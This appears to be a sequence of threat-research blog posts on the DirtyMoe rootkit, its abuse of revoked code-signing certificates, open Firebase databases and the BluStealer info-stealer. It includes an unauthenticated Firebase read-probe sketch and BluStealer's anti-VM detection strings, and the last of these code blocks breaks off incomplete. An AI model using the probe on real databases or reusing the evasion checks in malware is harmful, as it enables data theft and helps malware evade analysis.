[7] Crashdmp-ster Diving the Windows 8 Crash Dump Stack
[8] Ghost drivers named dump_*.sys
[9] Driver Signing
[10] Australian web hosts hit with a Manic Menagerie of malware

Appendix A

Registry entries used in the Start Routine


Appendix B

Example of registry entries configuring the driver

Key: ControlSet001\Control\WinApi
Value: WinDeviceAddress
Data: Ms312B9050App;   

Value: WinDeviceNumber

Value: WinDeviceName

Value: WinDeviceId
Data: dump_FDC.sys;

The post DirtyMoe: Rootkit Driver appeared first on Avast Threat Labs.

Research shows over 10% of sampled Firebase instances open

1 September 2021 at 13:46

Firebase is Google’s mobile and web app development platform. Developers can use Firebase to facilitate developing mobile and web apps, especially for the Android mobile platform.

At the end of July 2021 we did research into open Firebase instances.

In that research, we found about 180,300 Firebase addresses in our systems and found that approximately 19,300 of those Firebase DBs (10.7% of the tested DBs) were open, exposing their data to unauthenticated users due to misconfiguration by the app developers. This is quite a large percentage.

These addresses were statically and dynamically extracted from different sources, mainly from Android apps.

We took these Firebase addresses and examined them to see how many were open. In our testing, we looked only for instances that were open for “Read” access without credentials. We didn’t test for write access for obvious reasons.
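For context, a read-access probe of this kind typically issues an unauthenticated GET against the instance's `/.json` endpoint and checks whether the security rules deny it. The sketch below separates URL construction from the open/closed decision so the logic is testable offline; the instance name is hypothetical, and the status-code interpretation is our simplification, not the exact methodology used in the research:

```python
# Sketch of an unauthenticated read-access check against a Firebase
# Realtime Database. Network access is left to the caller so the decision
# logic stays testable offline.
def probe_url(project: str) -> str:
    # shallow=true limits the response size on large databases
    return f"https://{project}.firebaseio.com/.json?shallow=true"

def is_open(status_code: int) -> bool:
    # 200 = readable without credentials; 401/403 = rules deny access;
    # 404 = instance does not exist (not counted as open)
    return status_code == 200

print(probe_url("example-app"))
print(is_open(200), is_open(401))       # True False
```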

These open Firebase instances put the data stored and used by the apps developed with them at risk of theft, because apps can store and use a variety of information, some of it personally identifiable information (PII) such as names, birthdates, addresses, phone numbers, location information, and service tokens and keys, among other things. When developers use bad practices, DBs can even contain plaintext passwords. This means that the personal information of potentially over 10% of users of Firebase-based apps can be at risk.

An example of a “leaking” instance

Of course, our testing shows only a subset of all existing Firebase instances. However, we believe that this 10.7% figure is reasonably representative of the proportion of all Firebase instances that are currently open.

We took our findings to Google and asked them to inform the developers of the apps we identified as open, as well as contacting some of the developers ourselves. Google has several features to improve data protection in Firebase, including notifications and regular emails about potential misconfigurations.

While we appreciate Google’s actions based on our findings, we also believe it’s important to inform Firebase developers about the potential risk of misconfigured DBs and to follow the best practices that Google has provided. This also once again underscores the importance of making security and privacy a key part of the entire app development process, not just a later “bolt on”.

Most importantly, we want to urge all developers to check their databases and other storage for possible misconfigurations to protect users’ data and make our digital world safer.


DirtyMoe: Code Signing Certificate

17 September 2021 at 12:05


The DirtyMoe malware uses a driver signed with a revoked certificate that can be seamlessly loaded into the Windows kernel. Therefore, one of our goals is to analyze how Windows works with the code signatures of Windows drivers. Similarly, we will also be interested in the code-signature verification of user-mode applications, since User Account Control (UAC) does not block application execution even when an application is signed with a revoked certificate. The second goal is a statistical analysis of the certificates that sign the DirtyMoe driver, because these certificates are also used to sign other malicious software. We focus on determining the certificates’ origin and prevalence, and on a quick analysis of the top 10 software signed with these certificates.

Contrary to what has often been assumed, Windows loads drivers signed with revoked certificates. Moreover, the results indicate that UAC does not verify revocation online but only via the local system storage, which must be updated manually by the user. The DirtyMoe certificates are used to sign much other software, and the number of incidents is still growing. Furthermore, Taiwan and Russia seem to be the most affected by these faux signatures.

Overall, the analyzed certificates can be declared malicious, and they should be monitored. UAC contains a significant vulnerability in its code-signature verification routine. Therefore, in addition to avoiding downloads from untrustworthy sources, Windows users should not rely fully on the inbuilt protections alone. Due to the flawed certificate verification, manual verification of the certificate is recommended for executables requiring elevated privileges.

1. Introduction

The DirtyMoe malware is a complex malicious backdoor designed to be modularized, undetectable, and untrackable. The main aim of DirtyMoe is cryptojacking and DDoS attacks; basically, it can do anything the attackers want. The previous study, published as DirtyMoe: Introduction and General Overview, has shown that DirtyMoe also employs various self-protection and anti-forensic mechanisms. One of the more significant safeguards defending DirtyMoe is a rootkit. What is significant about using a rootkit is that it offers advanced techniques for hiding malicious activity at the kernel layer. Since DirtyMoe is complex malware that has undergone long-term development, the malware authors have implemented a variety of rootkit mechanisms. The DirtyMoe: Rootkit Driver post examines the DirtyMoe driver functionality in detail.

However, another important aspect of the rootkit driver is its digital signature. Rootkits generally exploit the system using a Windows driver. Microsoft requires code signing with certificates attesting that the driver vendor is trusted and verified by a certification authority (CA) that Microsoft trusts, and Windows has not allowed unsigned drivers to load since 64-bit Windows Vista. Although the principle of code signing is correct and safe, Windows allows loading a driver even when the certificate issuer has explicitly revoked the certificate used. The reasons for this behavior are various, whether in terms of performance or backward compatibility. The weak point of this certificate management appears when malware authors steal a certificate that was verified by Microsoft and revoked by the CA in the past: the malware authors can then use this certificate for malicious purposes. This is precisely the case with DirtyMoe, which still signs its driver with stolen certificates. Moreover, users cannot affect the code-signature verification via User Account Control (UAC), since drivers are loaded in kernel mode.

Motivated by the loading of drivers with revoked certificates, the main issues addressed in this paper are an analysis of how Windows handles code signatures in kernel and user mode, and a detailed analysis of the certificates used to code-sign the DirtyMoe driver.

This paper first gives a brief overview of UAC and the code signing of Windows drivers, with several observations about the principle of UAC and how Windows manages the certificate revocation list (CRL). The remaining part of the paper reviews in detail the available information about the certificates that have been used to code-sign the DirtyMoe driver.

Thus far, three different certificates have been discovered and confirmed by our research group as malicious. Drivers signed with these certificates can be loaded into the 64-bit Windows kernel notwithstanding their revocation. An initial objective of the last part is an analysis of the suspicious certificates from a statistical point of view. We studied three viewpoints. The first is the geographical origin of the captured samples signed with the malicious certificates. The second is the number of captured samples, including a prediction factor for each certificate. The last frame of reference is a statistical overview of the types of signed software, because the malware authors use the certificates to sign various software, e.g., cracked software or other popular user applications that have been patched with a malicious payload. We selected the top 10 software signed with the revoked certificates and performed a quick analysis. The categories of this software help us ascertain the type of software primarily targeted by the malware authors. Another significant scope of this research is looking for information about the companies whose certificates have probably been leaked or stolen.

2. Background

Digital signatures can provide evidence of the identity, origin, and status of electronic documents, including software. The user can verify the validity of a signature with the certification authority. Software developers use digital signatures to code-sign their products. Through the signature, the software authors guarantee that executables or scripts have not been corrupted or altered since the products were digitally signed. Software users can verify the credibility of software developers before running or installing the software.

Each piece of code-signed software provides information about its issuer and a URL pointing to the current certificate revocation list (CRL), known as the CRL Distribution Point. Windows can follow the URL and check the validity of the used certificate. If the verification fails, User Account Control (UAC) blocks execution of software whose code signature is not valid. Equally important is the code signature of Windows drivers, which uses a different approach to digital signature verification. Whereas user-mode software signatures are optional, a Windows driver must be signed by a CA that Windows trusts. Driver signing has been mandatory since 64-bit Windows Vista.

2.1 User Account Control and Digital Signature

Windows 10 prompts the user for confirmation if the user wants to run software with elevated permissions. User Account Control (UAC) should help prevent users from inadvertently running malicious software or making other changes that might destabilize the Windows system. Additionally, UAC uses color coding for different scenarios: blue for a verified signature, yellow for an unverified one, and red for a rejected certificate; see Figure 1.

Figure 1: UAC of verified, unverified, and rejected software requiring the highest privileges

Unfortunately, users are the weakest link in the security chain and often willingly choose to ignore such warnings. Windows itself does not provide 100% protection against unknown publishers and even revoked certificates. So, users’ ignorance and inattention assist malware authors.

2.2 Windows Drivers and Digital Signature

The certificate policy is diametrically different for Windows drivers compared to other user-mode software. While user-mode software does not require code signing, code signing is mandatory for a Windows driver; moreover, a certificate authority trusted by Microsoft must be used. Nonetheless, the certificate policy for Windows drivers is quite complicated, as MSDN demonstrates [1].

2.2.1 Driver Signing

Historically, 32-bit drivers of all types were unsigned, e.g., drivers for printers, scanners, and other specific hardware. Windows Vista brought a new signature policy, but Microsoft could not stop supporting legacy drivers due to backward compatibility. However, 64-bit Windows Vista and later require digitally signed drivers according to the new policy. Hence, 32-bit drivers do not have to be signed, since these drivers cannot be loaded into 64-bit kernels. Code signing of 32-bit drivers is good practice, although the certificate policy does not require it.

Microsoft has no capacity to sign every driver (more precisely, every file) provided by third-party vendors. Therefore, a cross-certificate policy is used to provide an instrument for creating a chain of trust. This policy allows the release of subordinate certificates that build the chain of trust from the Microsoft root certification authority to multiple other CAs that Microsoft has accredited. The current cross-certificate list is documented in [2]. In fact, the final driver signature is done with a certificate issued by a subordinate CA that Microsoft authorized.

Figure 2 illustrates an example certificate chain, and Figure 3 shows the corresponding output of signtool.

Figure 2: Certification chain of one Avast driver
Figure 3: Output of signtool.exe for one Avast driver
2.2.2 Driver Signature Verification

For user-mode software, digital signatures are verified remotely via the CRL obtained from the certificate issuer. In contrast, the signature verification of Windows drivers cannot be performed online because of the absence of a network connection during kernel bootup. Moreover, the kernel boot must be fast, and a reasonable approach to the signature verification is to implement a light version of the verification algorithm.

The Windows system has hardcoded root certificates of several CAs and can therefore verify the signing certificate chain offline. However, the kernel has no chance to authenticate signatures against CRLs, and the same applies to expired certificates. Taken together, this approach is implemented for kernel performance and backward driver compatibility. Thus, leaked and compromised certificates of a trusted driver vendor cause a severe problem for Windows security.

3. CRL, UAC, and Drivers

As was pointed out in the previous section, the CRL contains a list of revoked certificates. UAC should verify the chain of trust of software being run that requires higher permissions. The UAC dialog then shows the status of the certificate verification, which can end with one of two statuses: verified publisher or unknown publisher [3]; see Figure 1.

However, we have a scenario where software is signed with a revoked certificate and its execution is not blocked by UAC. Moreover, the code signature is marked as unknown publisher (yellow-titled UAC prompt), although the certificate is in the CRL.

3.1 Cryptographic Services and CRL Storage

Cryptographic Services confirms the signatures of Windows files and stores file information in the C:\Users\<user>\AppData\LocalLow\Microsoft\CryptnetUrlCache folder, including the CRL of the verified file. The CryptnetUrlCache folder (cache) is updated, for instance, when users manually check digital signatures via “Properties -> Digital Signature” or via the signtool tool, as Figure 3 and Figure 4 illustrate. The certificate verification processes the whole chain of trust, including the CRL, and deposits possible revocations in the cache folder.

Figure 4: List of digital signatures via Explorer

Another storage location for CRLs is Certificate Storage, accessible via the Certificate Manager Tool; see Figure 5. This storage can be managed by a local admin or a domain.

Figure 5: Certificate Manager Tool
3.2 CRL Verification by UAC

UAC itself does not verify the code signature, or more precisely the chain of trust, online; this is probably because of system performance. The UAC code-signing verification checks the signature and CRL via CryptnetUrlCache and the system Certificate Storage. Therefore, UAC marks malicious software signed with a revoked certificate as unknown publisher, because CryptnetUrlCache is not initially up to date.

Suppose the user adds appropriate CRL into Certificate Storage manually using this command:
certutil -addstore -f Root CSC3-2010.crl

In that case, UAC successfully detects the software as suspicious and displays the message “An administrator has blocked you from running this app.” without assistance from Cryptographic Services, and therefore offline.
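The import step above can also be scripted. A hedged sketch (the actual call is Windows-only and needs admin rights; the helper names are ours, not part of certutil):

```python
import subprocess

def build_crl_import_cmd(crl_path: str, store: str = "Root") -> list:
    """Build the certutil invocation shown above: import a CRL into the
    local certificate store, with -f forcing an overwrite of any entry."""
    return ["certutil", "-addstore", "-f", store, crl_path]

def import_crl(crl_path: str) -> int:
    # Windows-only; must run elevated to write to the machine store.
    return subprocess.run(build_crl_import_cmd(crl_path)).returncode
```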

The Windows update does not include CRLs of the cross-certificate authorities that Microsoft authorized to code-sign Windows files. We verified this fact with the following Windows updates and version:

  • Windows Malicious Software Removal Tool x64 – v5.91 (KB890830)
  • 2021-06 Cumulative update for Windows 10 Version 20H2 for x64-based System (KB5003690)
  • Windows version: 21H1 (OS Build 19043.1110)

In summary, UAC checks digital signatures via the system's local CRL storage and does not verify code signatures online.

3.3 Windows Driver and CRL

Returning briefly to the code signing of Windows drivers required by the kernel: the kernel can verify a signature offline, but it cannot check CRLs, since Cryptographic Services and network access are not available at boot time.

Turning now to the experimental evidence on offline CRL verification of drivers. The case described in Section 3.2 shows that UAC can verify a CRL offline. So, the tested hypothesis was that the Windows kernel could verify the CRL of a loaded driver offline if an appropriate CRL is stored in Certificate Storage. We used the DirtyMoe malware to deploy a malicious driver signed with a revoked certificate. The corresponding CRL of the revoked certificate was imported into Certificate Storage. However, the driver was still active after the system restart, indicating that the rootkit was successfully loaded into the kernel even though the driver certificate had been revoked and the current CRL had been imported into Certificate Storage. There is a high probability that the kernel skips CRL verification even against local storage.

4. Certificate Analysis

The scope of this research covers the following three certificates:

Beijing Kate Zhanhong Technology Co.,Ltd.
Valid From: 28-Nov-2013 (2:00:00)
Valid To: 29-Nov-2014 (1:59:59)
SN: 3c5883bd1dbcd582ad41c8778e4f56d9
Thumbprint: 02a8dc8b4aead80e77b333d61e35b40fbbb010a0
Revocation Status: Revoked on 22-May-‎2014 (9:28:59)
CRL Distribution Point:

Beijing Founder Apabi Technology Limited
Valid From: 22-May-2018 (2:00:00)
Valid To: 29-May-2019 (14:00:00)
SN: 06b7aa2c37c0876ccb0378d895d71041
Thumbprint: 8564928aa4fbc4bbecf65b402503b2be3dc60d4d
Revocation Status: Revoked on 22-May-‎2018 (2:00:01)
CRL Distribution Point:

Shanghai Yulian Software Technology Co., Ltd. (上海域联软件技术有限公司)
Valid From: 23-Mar-2011 (2:00:00)
Valid To: 23-Mar-2012 (1:59:59)
SN: 5f78149eb4f75eb17404a8143aaeaed7
Thumbprint: 31e5380e1e0e1dd841f0c1741b38556b252e6231
Revocation Status: Revoked on 18-Apr-‎2011 (10:42:04)
CRL Distribution Point:
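The thumbprints listed above are SHA-1 digests computed over each certificate's DER encoding, which makes them convenient for matching certificates against these IoCs; a minimal sketch:

```python
import hashlib

def cert_thumbprint(der_bytes: bytes) -> str:
    """Windows-style certificate thumbprint: SHA-1 over the DER encoding."""
    return hashlib.sha1(der_bytes).hexdigest()

# Usage: compare against an IoC, e.g.
# cert_thumbprint(open("driver_cert.der", "rb").read()) ==
#     "31e5380e1e0e1dd841f0c1741b38556b252e6231"
```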

4.1 Beijing Kate Zhanhong Technology Co.,Ltd.

We did not find any relevant information about the Beijing Kate Zhanhong Technology company. Avast captured 124 hits signed with the Beijing Kate certificate between 2015 and 2021. However, the trend for 2021 points downward; see Figure 6. Only 19 hits were captured in the first 7 months of this year, so the prediction for this year (2021) is approx. 30 hits signed with this certificate.
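The projection is a simple linear extrapolation of the partial-year telemetry:

```python
def extrapolate_yearly(hits_so_far: int, months_elapsed: int) -> int:
    """Project a full-year hit count from a partial year of telemetry."""
    return round(hits_so_far * 12 / months_elapsed)

# 19 hits in the first 7 months of 2021 project to 33 hits for the year,
# which the article rounds to approx. 30:
print(extrapolate_yearly(19, 7))  # 33
```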

Figure 6: Number of hits and prediction of Beijing Kate

Ninety-five percent of the total hits are located in Asia; see Table 1 for the detailed GeoIP distribution across the most significant years.

Year / Country    CN    TW    UA    MY    KR    HK
2015              15     1     3     -     -     -
2018               3     1     -     2     -     -
2019              19     -     -     -     -     2
2020              12    46     -     1     -     -
2021              11     -     -     -     8     -
Total             60    48     3     3     8     2
Table 1: Geographic distribution of Beijing Kate certificates

The malware authors use this certificate to sign Windows system drivers in 61% of the monitored hits, while Windows executables are signed in 16% of occurrences. Overall, the malware authors appear to focus on Windows drivers, which must be signed with a valid certificate.

4.2 Beijing Founder Apabi Technology Limited

Beijing Founder Apabi Technology Co., Ltd. was founded in 2001 and is a professional digital publishing technology and service provider under the Peking University Founder Credit Group. The company also develops software for e-book reading, such as Apabi Reader [4].

The Beijing Founder certificate has been observed as malicious in 166 hits with 18 unique SHAs. The most represented sample is an executable called “Linking.exe”, which was hit in 8 countries, most often in China (exactly 71 cases). The first occurrence and the peak of the hits were observed in 2018. The incidence of hits has been an order of magnitude lower in the past few years, and we predict an increase in the order of tens of hits, as Figure 7 illustrates.

Figure 7: Number of hits and prediction of Beijing Founder
4.3 Shanghai Yulian Software Technology Co., Ltd.

Shanghai Yulian Software Technology Co. was founded in 2005 and provides network security guarantees for network operators. Its portfolio covers services in the information security field, namely e-commerce, enterprise information security, security services, and system integration [5].

The Shanghai Yulian Software certificate is the most widespread of the three. Avast captured this certificate in 10,500 cases over the last eight years. Moreover, the prevalence of samples signed with this certificate is on the rise, although the certificate was revoked by its issuer in 2011. The occurrence peaked in 2017 and 2020. We assume a linear increase in incidence, and the prediction for 2021 is based on its first months; it indicates that this revoked certificate will also dominate in 2021; see the trend in Figure 8. We have no record of what caused the significant decline in 2018 and 2019.

Figure 8: Number of hits and prediction of Shanghai Yulian Software

The previous certificates dominate only in Asia, but the Shanghai Yulian Software certificate prevails in both Asia and Europe, as Figure 9 illustrates. The dominant countries are Taiwan and Russia, with China and Thailand following closely; see Table 2 for the distribution across selected countries.

Figure 9: Distribution of hits in point of continent view for Shanghai Yulian Software
Year / Country     TW     RU    CN    TH    UA    BR    EG    HK    IN    CZ
2016                6      -    18     -     -     2     -     -     -     -
2017              925     28    57     -     -     4     -     -     -     1
2018              265     31    79     4     3    26     4     1     -     2
2019              180     54    56    10     9    98   162     5    45     1
2020              131   1355   431   278   232   112    17   168    86    24
Total            1507   1468   641   292   244   242   183   174   131    28
Table 2: Geographic distribution of Shanghai Yulian Software certificate

As in previous cases, the malware authors have been using the Shanghai Yulian Software certificate to sign Windows drivers (75% of hits). Another 16% has been used for EXE and DLL executables; see Figure 10 for the detailed distribution.

Figure 10: Distribution of file types for Shanghai Yulian Software
4.3.1 Analysis of Top 10 Captured Files

We summarize the most frequent files in this subchapter. Table 3 shows the occurrence of the top 10 executables related to user applications. We do not focus on DirtyMoe drivers, because this topic is covered in DirtyMoe: Rootkit Driver.

File Name (by hits)    Hits      File Name (by countries)   Countries
WFP_Drive.sys          1056      Denuvo64.sys                      81
LoginDrvS.sys          1046      WsAP-Filmora.dll                  73
Denuvo64.sys            718      SlipDrv7.sys                      20
WsAP-Filmora.dll        703      uTorrent.exe                      47
uTorrent.exe            417      RTDriver.sys                      41
SlipDrv7.sys            323      SlipDrv10.sys                     42
LoginNpDriveX64.sys     271      SbieDrv.sys                       22
RTDriver.sys            251      SlipDrv81.sys                     16
SlipDrv10.sys           238      ONETAP V4.EXE                     16
SbieDrv.sys             189      ECDM.sys                          13
Table 3: The most common file names by hit count (left) and by number of countries (right)

Below, we examine the five most notable executables signed with the Shanghai Yulian Software certificate. The malware authors target popular and commonly used user applications such as video editors, communication applications, and video games.

1) WFP_Drive.sys

The WFP driver was hit in an App-V (Application Virtualization) folder in C:\ProgramData. The driver can filter network traffic similarly to a firewall [6], so the malware can block and monitor arbitrary connections, including transferred data. The malware does not need special rights to write into the ProgramData folder. The driver's and App-V's file names are not suspicious at first glance, since App-V uses the Hyper-V Virtual Switch based on the WFP platform [7].

Naturally, the driver has to be loaded by a process with administrator permissions. The process must then acquire a specific privilege called SeLoadDriverPrivilege (load and unload device drivers) for the driver loading to succeed. The process requests the privilege via the API call EnablePriviliges, which AVs can monitor. Unfortunately, Windows loads drivers with revoked certificates, so the whole security mechanism is inherently flawed.

2) LoginDrvS.sys

Further, the LoginDrvS driver uses a similar principle to the WFP driver. The malware camouflages its driver in a commonly used application folder: the LineageLogin application folder, which serves as a launcher for various applications, predominantly video games. LineageLogin is implemented in Pascal [8]. LineageLogin itself contains a suspicious embedded DLL, but that is outside the scope of this topic. Both drivers (WFP_Drive.sys and LoginDrvS.sys) are presumably from the same malware author, as their PDB paths indicate:

  • f:\projects\c++\win7pgkill\amd64\LoginDrvS.pdb (10 unique samples)
  • f:\projects\c++\wfp\objfre_win7_amd64\amd64\WFP_Drive.pdb (8 unique samples)

Similar behavior is described in Trojan.MulDrop16.18994, see [9].

3) Denuvo64.sys

Denuvo is an anti-piracy protection technology used by hundreds of software companies around the world [10]. The solution is effectively a legal rootkit that can also detect cheating and other unwanted activity; therefore, Denuvo has to use a kernel driver.

An easy way to deploy a malicious driver is via cracks, which users still download in abundance. The malware author packs the malicious driver into a crack, and users set up a rootkit backdoor with each run of the crack. The malicious driver performs the function users expect, e.g., anti-anti-cheat or executable patching, but it very often also serves as a backdoor.

We have revealed 8 unique samples of the malicious Denuvo driver within 1046 cases. Most occurrences are in Russia; see Figure 11. The most hits relate to cracks of the following video games: Constructor, Injustice 2, Prey, Puyo Puyo Tetris, TEKKEN 7 – Ultimate Edition, Total War – Warhammer 2, Total War – Saga Thrones of Britannia.

Figure 11: Distribution of Denuvo driver across the countries

4) WsAP-Filmora.dll

Wondershare Filmora is a simple video editor with free and paid versions [11], so there is room for cracks and malware activity. All hit paths point to crack activity where users tried to bypass the trial version of the Filmora editor. No PDB path has been captured; therefore, we cannot attribute the malware authors based on other samples signed with the same certificate. WsAP-Filmora.dll is widespread throughout the world (73 countries); see the detailed country distribution in Figure 12.

Figure 12: Filmora DLL distribution across the countries

5) μTorrent.exe

μTorrent is a freeware P2P client for the BitTorrent network [12]. Avast has detected 417 hits of the malicious μTorrent application. The malicious application is based on the original μTorrent client, with the same functionality, GUI, and icon. If a user downloads and runs this modified μTorrent client, nothing about the application's behavior or design appears suspicious.

The original application is signed with a BitTorrent Inc. certificate, while the malicious version is signed with the Shanghai Yulian Software certificate. Everyday users who check the digital signature see that the executable is signed. However, the information revealing the signature's suspiciousness is buried in details that are not visible at first glance; see Figure 13.

Figure 13: Digital signatures of original and malicious μTorrent client

The malicious signature contains Chinese characters, although the sample's prevalence points to Russia; China, by contrast, has no hits. Figure 14 illustrates the detailed country distribution of the malicious μTorrent application.

Figure 14: Distribution of μTorrent client across the countries
4.3.2 YDArk Rootkit

We have found a GitHub repository containing a tool called YDArk that monitors system activities via a driver signed with the compromised certificate. The last signature was made in May 2021; hence, the stolen certificate appears to still be in use, despite having been revoked 10 years ago. The repository is managed by two users, both located in China. The YDArk driver was signed with the compromised certificate by ScriptBoy2077, who admitted that the certificate is compromised and expired with this note:

I have signed the .sys file with a compromised, expired certificate, may it is helpful to those my friends who don’t know how to load an unsigned driver.

The private key of the compromised certificate is not available on the clearnet; we searched for it by certificate name, serial number, hashes, etc. We can therefore assume that the certificate and private key are located on the darknet and shared within a narrow group of malware authors. Consequently, the relationship between YDArk (more precisely, ScriptBoy2077) and the DirtyMoe driver is compelling. Additionally, DirtyMoe C&C servers are in most cases also located in China, as we described in DirtyMoe: Introduction and General Overview.

5. Discussion

The most interesting finding of this research is that Windows allows drivers signed with revoked certificates to be loaded even when an appropriate CRL is stored locally. Windows successfully verifies signature revocation offline for user-mode applications via UAC. However, since Windows loads drivers with revoked certificates into the kernel despite an up-to-date CRL, it is evident that the Windows kernel skips the CRL check. The CRL verification is likely omitted for performance reasons at boot time. This is a hypothesis, so further research will be needed to fully understand the process and implementation of driver loading and CRL verification.

Another important finding is that UAC does not query the online CRL when verifying the digital signatures of user-mode applications that require higher permissions. It is somewhat surprising that UAC blocks such applications only if the user manually checks the chain of trust before the application is run; in other words, only if the current CRL has been downloaded and is up to date before UAC runs. The evidence therefore suggests that UAC does not fully protect users against malicious software signed with revoked certificates. Consequently, users should be careful when a UAC prompt appears.

The DirtyMoe driver has been signed with the three certificates that we analyzed in this research. Evidence suggests that DirtyMoe's certificates are also used to code-sign other potentially malicious software. It is hard to determine precisely how many malware authors use the revoked certificates. We classified a few clusters of unique SHA samples that point to the same malware authors via PDB paths, but many other groups cannot be unequivocally identified. The malware authors using the revoked certificates may well be a narrow group; however, further work comparing the code similarities of the signed software is required to confirm this assumption. This hypothesis is supported by the fact that the samples have been dominantly concentrated in Taiwan and Russia over such a long time horizon. Moreover, leaked private keys are often available on the internet, but these revoked certificates have no such record. This could mean that the private keys are passed around within a particular malware author community.

According to these data, we can infer that the Shanghai Yulian Software Technology certificate is the most commonly used in the wild and is on the rise, although it was revoked 10 years ago. Geographic data demonstrates that the malware authors primarily target the Asian and European continents, but the reason for this is not apparent, so questions remain. Regarding the types of misused software, the analysis of samples signed with the Shanghai Yulian Software certificate confirmed that most samples are rootkits deployed together with cracked or patched software. Other types of misused software are popular user applications, such as video games, communication software, and video editors. One issue is that users observe the expected behavior of the suspicious software while malicious mechanisms or backdoors are deployed alongside it.

In summary, the DirtyMoe’s certificates are still used for code signing of other software than the DirtyMoe malware, although the certificates were revoked many years ago.

6. Conclusion

The malware analysis of the DirtyMoe driver (rootkit) uncovered three certificates used to code-sign suspicious executables. The certificates were revoked in the middle of their validity periods; however, they are still widely used to code-sign other malicious software.

The revoked certificates are principally misused to code-sign malicious Windows drivers (rootkits), because 64-bit Windows systems require driver signatures for greater security. On the other hand, Windows does not verify driver signatures against CRLs. In addition, the malware authors abuse the certificates to sign popular software to increase credibility, with the software patched to include malicious payloads. Another essential point is that UAC verifies signatures against the local CRL storage, which may not be up to date. UAC does not download the current version of the CRL when users run software with the highest permissions; consequently, this can be a serious weakness.

One source of uncertainty is the identity of the malware authors misusing the revoked certificates. Everything points to a narrow group of authors primarily located in China. Further investigation of the signed samples is needed to confirm that they contain payloads with similar functionality or code similarities.

Overall, these results and statistics suggest that Windows users are still careless when running programs downloaded from dubious sources, including various cracks and keygens. Moreover, Windows lacks an effective mechanism that would strongly warn users when they try to run software with revoked certificates, although techniques to verify the validity of digital signatures exist.


[1] Driver Signing
[2] Cross-Certificates for Kernel Mode Code Signing
[3] How Windows Handles Running Files Whose Publisher’s Certificate(s) Have Been Revoked
[4] Beijing Founder Apabi Technology Limited
[5] Shanghai Yulian Software Technology Co., Ltd.
[6] WFP network monitoring driver (firewall)
[7] Hyper-V Virtual Switch
[8] Lineage Login
[9] Dr. Web: Trojan.MulDrop16.18994
[10] Denuvo
[11] Filmora
[12] μTorrent

The post DirtyMoe: Code Signing Certificate appeared first on Avast Threat Labs.

BluStealer: from SpyEx to ThunderFox

By: Anh Ho
20 September 2021 at 17:06


BluStealer is a crypto stealer, keylogger, and document uploader written in Visual Basic that loads C# .NET hack tools to steal credentials. The family was first mentioned by @James_inthe_box in May and referred to as a310logger. In fact, a310logger is just one of the namespaces within the .NET component that appears in the string artifacts. Around July, Fortinet referred to the same family as a “fresh malware”, and recently it was mentioned again as BluStealer by GoSecure. In this blog, we go with the BluStealer name while providing a fuller view of the family along with details of its inner workings.

a310logger is just one of the multiple C# hack tools in BluStealer’s .NET component.

BluStealer is primarily spread through malspam campaigns. A large number of the samples we found come from a particular campaign recognizable by its use of a unique .NET loader, which is analyzed in the .NET Loader Walkthrough section below. Below are two BluStealer malspam samples: the first is a fake DHL invoice in English; the second is a fake message, in Spanish, from General de Perfiles, a Mexican metal company. Both samples contain .iso attachments and download URLs, and the lure claims the recipient needs to open and fill out the attached form to resolve a problem. The attachments contain the malware executables packed with the mentioned .NET loader.

In the graph below, we can see a significant spike in BluStealer activity around September 10-11, 2021.

The daily amount of Avast users protected from BluStealer

BluStealer Analysis

As mentioned, BluStealer consists of a core written in Visual Basic and C# .NET inner payload(s). Both components vary greatly among samples, indicating the malware builder's ability to customize each component separately. The VB core reuses a large amount of code from a 2004 SpyEx project, hence the inclusion of “SpyEx” strings in early samples from May. However, the malware authors have added the capabilities to steal crypto wallet data, swap crypto addresses present in the clipboard, find and upload document files, and exfiltrate data through SMTP and the Telegram Bot API, as well as anti-analysis/anti-VM tactics. The .NET component, on the other hand, is primarily a credential stealer patched together from a combination of open-source C# hack tools such as ThunderFox, ChromeRecovery, StormKitty, and firepwd. Note that not all of the mentioned features are available in every single sample.


Example of how the strings are decrypted within BluStealer

Each string is encrypted with a unique key. Depending on the sample, the encryption algorithm can be the XOR cipher, RC4, or the WinZip AES implementation from this repo. Below is a Python demonstration of the custom AES algorithm:

 A utility to help decrypt all strings in IDA is available here.
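Of the three schemes, RC4 is the easiest to reimplement when writing such a string-decryption utility; a minimal pure-Python version (the same function both encrypts and decrypts):

```python
def rc4(key: bytes, data: bytes) -> bytes:
    """Plain RC4: key-scheduling (KSA) followed by the PRGA keystream XOR."""
    S = list(range(256))
    j = 0
    for i in range(256):                      # KSA
        j = (j + S[i] + key[i % len(key)]) & 0xFF
        S[i], S[j] = S[j], S[i]
    out = bytearray()
    i = j = 0
    for byte in data:                         # PRGA
        i = (i + 1) & 0xFF
        j = (j + S[i]) & 0xFF
        S[i], S[j] = S[j], S[i]
        out.append(byte ^ S[(S[i] + S[j]) & 0xFF])
    return bytes(out)

print(rc4(b"Key", b"Plaintext").hex())  # bbf316e8d940af0ad3 (standard test vector)
```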

Anti-VM Tactics

BluStealer checks the following conditions:

If property Model of  Win32_ComputerSystem WMI class contains:

VIRTUA (without L), VMware Virtual Platform, VirtualBox, microsoft corporation, vmware, VMware, vmw

If property SerialNumber of Win32_BaseBoard WMI class contains  0 or None

If the following files exist:

  • C:\\Windows\\System32\\drivers\\vmhgfs.sys
  • C:\\Windows\\System32\\drivers\\vmmemctl.sys
  • C:\\Windows\\System32\\drivers\\vmmouse.sys
  • C:\\Windows\\System32\\drivers\\vmrawdsk.sys
  • C:\\Windows\\System32\\drivers\\VBoxGuest.sys
  • C:\\Windows\\System32\\drivers\\VBoxMouse.sys
  • C:\\Windows\\System32\\drivers\\VBoxSF.sys
  • C:\\Windows\\System32\\drivers\\VBoxVideo.sys

If any of these conditions are satisfied, BluStealer will stop executing.
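These checks can be reimplemented for triage or to test whether an analysis VM would be detected. The WMI lookups are Windows-only, so this sketch takes the Model and SerialNumber values as parameters; the marker and file lists are copied from the conditions above:

```python
import os

# Markers taken verbatim from BluStealer's checks above.
VM_MODEL_MARKERS = ("VIRTUA", "VMware Virtual Platform", "VirtualBox",
                    "microsoft corporation", "vmware", "VMware", "vmw")
VM_DRIVER_FILES = (
    r"C:\Windows\System32\drivers\vmhgfs.sys",
    r"C:\Windows\System32\drivers\vmmemctl.sys",
    r"C:\Windows\System32\drivers\vmmouse.sys",
    r"C:\Windows\System32\drivers\vmrawdsk.sys",
    r"C:\Windows\System32\drivers\VBoxGuest.sys",
    r"C:\Windows\System32\drivers\VBoxMouse.sys",
    r"C:\Windows\System32\drivers\VBoxSF.sys",
    r"C:\Windows\System32\drivers\VBoxVideo.sys",
)

def looks_like_vm(model: str, baseboard_serial: str) -> bool:
    """Mirror BluStealer's decision: any hit means execution stops."""
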